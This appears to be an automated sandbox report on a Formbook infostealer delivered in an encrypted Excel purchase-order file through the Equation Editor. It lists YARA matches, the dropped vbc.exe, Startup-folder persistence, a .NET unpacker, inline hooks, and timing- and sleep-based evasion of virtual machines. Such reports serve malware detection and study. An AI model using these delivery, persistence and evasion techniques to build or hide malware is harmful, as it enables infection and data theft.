          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winXLSX@14/11@5/3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00092720 CoInitialize,CoCreateInstance,OleUninitialize,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO11272020.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR1332.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO11272020.xlsxVirustotal: Detection: 35%
          Source: PO11272020.xlsxReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Windows\SysWOW64\chkdsk.exeFile written: C:\Users\user\AppData\Roaming\98-QN40B\98-logri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: PO11272020.xlsxStatic file information: File size 2454528 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: netstat.pdb source: vbc.exe, 00000005.00000002.2237473398.0000000000469000.00000004.00000020.sdmp
          Source: Binary string: chkdsk.pdb source: vbc.exe, 00000008.00000002.2225152811.00000000004E4000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, chkdsk.exe
          Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\browser\app\firefox.pdb source: chkdsk.exe, 00000009.00000003.2255516069.0000000003C40000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb source: vbc.exe
          Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb' source: vbc.exe, 00000004.00000002.2191903785.0000000000738000.00000004.00000020.sdmp
          Source: PO11272020.xlsxInitial sample: OLE indicators vbamacros = False
          Source: PO11272020.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: vbc[1].exe.2.dr, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: vbc.exe.2.dr, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: vbc.exe.4.dr, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.vbc.exe.d70000.2.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.vbc.exe.d70000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.vbc.exe.d70000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.vbc.exe.d70000.3.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.2.vbc.exe.f20000.2.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.vbc.exe.f20000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.vbc.exe.f20000.3.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.f20000.0.unpack, Testeconnect/Form2.cs.Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xE41D24F5 [Wed Apr 11 07:34:13 2091 UTC]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00190C59 push esp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00197F20 pushfd ; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00198122 pushfd ; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00190277 push esp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00198BB8 push eax; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D0D2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D0DB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D085 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D13C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00407AD0 pushad ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00405DE1 push ds; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041659B push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0084DFA1 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00390C59 push esp; iretd
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00397F20 pushfd ; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00398122 pushfd ; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00390277 push esp; iretd
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00398BB8 push eax; retf
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041D0D2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041D0DB push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041D085 push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041D13C push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00407AD0 pushad ; iretd
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00405DE1 push ds; iretd
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041659B push ecx; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008CDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0254DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0009D085 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0009D0DB push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0009D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0009D13C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93997758183
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93997758183
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93997758183
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the startup folderShow sources
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeJump to dropped file
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: PO11272020.xlsxStream path 'EncryptedPackage' entropy: 7.9999248079 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000001098E4 second address: 00000000001098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000109B4E second address: 0000000000109B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409A80 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2472Thread sleep time: -240000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 260Thread sleep time: -180000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 260Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2660Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2520Thread sleep time: -58000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe TID: 2956Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 2200Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeFile opened: C:\Users\user\
          Source: explorer.exe, 00000006.00000000.2194662661.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2206084235.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
